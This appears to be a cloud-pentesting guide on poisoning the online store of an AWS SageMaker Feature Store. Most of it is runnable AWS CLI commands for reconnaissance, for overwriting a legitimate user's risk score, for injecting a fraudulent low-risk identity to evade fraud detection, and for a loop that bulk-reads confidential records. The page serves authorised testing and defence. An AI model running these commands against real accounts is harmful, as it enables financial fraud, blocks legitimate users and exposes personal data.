SageMaker Feature Store online store poisoning

Reading time: 5 minutes

Abuse sagemaker:PutRecord on a Feature Group with OnlineStore enabled to overwrite live feature values consumed by online inference. Combined with sagemaker:GetRecord, an attacker can read sensitive features. This does not require access to models or endpoints.

Requirements

• Permissions: sagemaker:ListFeatureGroups, sagemaker:DescribeFeatureGroup, sagemaker:PutRecord, sagemaker:GetRecord
• Target: Feature Group with OnlineStore enabled (typically backing real-time inference)
• Complexity: LOW - Simple AWS CLI commands, no model manipulation required

Steps

Reconnaissance

1. List Feature Groups with OnlineStore enabled

REGION=${REGION:-us-east-1}
aws sagemaker list-feature-groups \
  --region $REGION \
  --query "FeatureGroupSummaries[?OnlineStoreConfig!=null].[FeatureGroupName,CreationTime]" \
  --output table

2. Describe a target Feature Group to understand its schema

FG=<feature-group-name>
aws sagemaker describe-feature-group \
  --region $REGION \
  --feature-group-name "$FG"

Note the RecordIdentifierFeatureName, EventTimeFeatureName, and all feature definitions. These are required for crafting valid records.

Attack Scenario 1: Data Poisoning (Overwrite Existing Records)

1. Read the current legitimate record

aws sagemaker-featurestore-runtime get-record \
  --region $REGION \
  --feature-group-name "$FG" \
  --record-identifier-value-as-string user-001

2. Poison the record with malicious values using inline --record parameter

NOW=$(date -u +%Y-%m-%dT%H:%M:%SZ)

# Example: Change risk_score from 0.15 to 0.99 to block a legitimate user
aws sagemaker-featurestore-runtime put-record \
  --region $REGION \
  --feature-group-name "$FG" \
  --record "[
    {\"FeatureName\": \"entity_id\", \"ValueAsString\": \"user-001\"},
    {\"FeatureName\": \"event_time\", \"ValueAsString\": \"$NOW\"},
    {\"FeatureName\": \"risk_score\", \"ValueAsString\": \"0.99\"},
    {\"FeatureName\": \"transaction_amount\", \"ValueAsString\": \"125.50\"},
    {\"FeatureName\": \"account_status\", \"ValueAsString\": \"POISONED\"}
  ]" \
  --target-stores OnlineStore

3. Verify the poisoned data

aws sagemaker-featurestore-runtime get-record \
  --region $REGION \
  --feature-group-name "$FG" \
  --record-identifier-value-as-string user-001

Impact: ML models consuming this feature will now see risk_score=0.99 for a legitimate user, potentially blocking their transactions or services.

Attack Scenario 2: Malicious Data Injection (Create Fraudulent Records)

Inject completely new records with manipulated features to evade security controls:

NOW=$(date -u +%Y-%m-%dT%H:%M:%SZ)

# Create fake user with artificially low risk to perform fraudulent transactions
aws sagemaker-featurestore-runtime put-record \
  --region $REGION \
  --feature-group-name "$FG" \
  --record "[
    {\"FeatureName\": \"entity_id\", \"ValueAsString\": \"user-999\"},
    {\"FeatureName\": \"event_time\", \"ValueAsString\": \"$NOW\"},
    {\"FeatureName\": \"risk_score\", \"ValueAsString\": \"0.01\"},
    {\"FeatureName\": \"transaction_amount\", \"ValueAsString\": \"999999.99\"},
    {\"FeatureName\": \"account_status\", \"ValueAsString\": \"approved\"}
  ]" \
  --target-stores OnlineStore

Verify the injection:

aws sagemaker-featurestore-runtime get-record \
  --region $REGION \
  --feature-group-name "$FG" \
  --record-identifier-value-as-string user-999

Impact: Attacker creates a fake identity with low risk score (0.01) that can perform high-value fraudulent transactions without triggering fraud detection.

Attack Scenario 3: Sensitive Data Exfiltration

Read multiple records to extract confidential features and profile model behavior:

# Exfiltrate data for known users
for USER_ID in user-001 user-002 user-003 user-999; do
  echo "Exfiltrating data for ${USER_ID}:"
  aws sagemaker-featurestore-runtime get-record \
    --region $REGION \
    --feature-group-name "$FG" \
    --record-identifier-value-as-string ${USER_ID}
done

Impact: Confidential features (risk scores, transaction patterns, personal data) exposed to attacker.

Testing/Demo Feature Group Creation (Optional)

If you need to create a test Feature Group:

REGION=${REGION:-us-east-1}
FG=$(aws sagemaker list-feature-groups --region $REGION --query "FeatureGroupSummaries[?OnlineStoreConfig!=null]|[0].FeatureGroupName" --output text)
if [ -z "$FG" -o "$FG" = "None" ]; then
  ACC=$(aws sts get-caller-identity --query Account --output text)
  FG=test-fg-$ACC-$(date +%s)
  ROLE_ARN=$(aws iam get-role --role-name AmazonSageMaker-ExecutionRole --query Role.Arn --output text 2>/dev/null || echo arn:aws:iam::$ACC:role/service-role/AmazonSageMaker-ExecutionRole)
  
  aws sagemaker create-feature-group \
    --region $REGION \
    --feature-group-name "$FG" \
    --record-identifier-feature-name entity_id \
    --event-time-feature-name event_time \
    --feature-definitions "[
      {\"FeatureName\":\"entity_id\",\"FeatureType\":\"String\"},
      {\"FeatureName\":\"event_time\",\"FeatureType\":\"String\"},
      {\"FeatureName\":\"risk_score\",\"FeatureType\":\"Fractional\"},
      {\"FeatureName\":\"transaction_amount\",\"FeatureType\":\"Fractional\"},
      {\"FeatureName\":\"account_status\",\"FeatureType\":\"String\"}
    ]" \
    --online-store-config "{\"EnableOnlineStore\":true}" \
    --role-arn "$ROLE_ARN"
  
  echo "Waiting for feature group to be in Created state..."
  for i in $(seq 1 40); do
    ST=$(aws sagemaker describe-feature-group --region $REGION --feature-group-name "$FG" --query FeatureGroupStatus --output text || true)
    echo "$ST"; [ "$ST" = "Created" ] && break; sleep 15
  done
fi

echo "Feature Group ready: $FG"

References

• AWS SageMaker Feature Store Documentation
• Feature Store Security Best Practices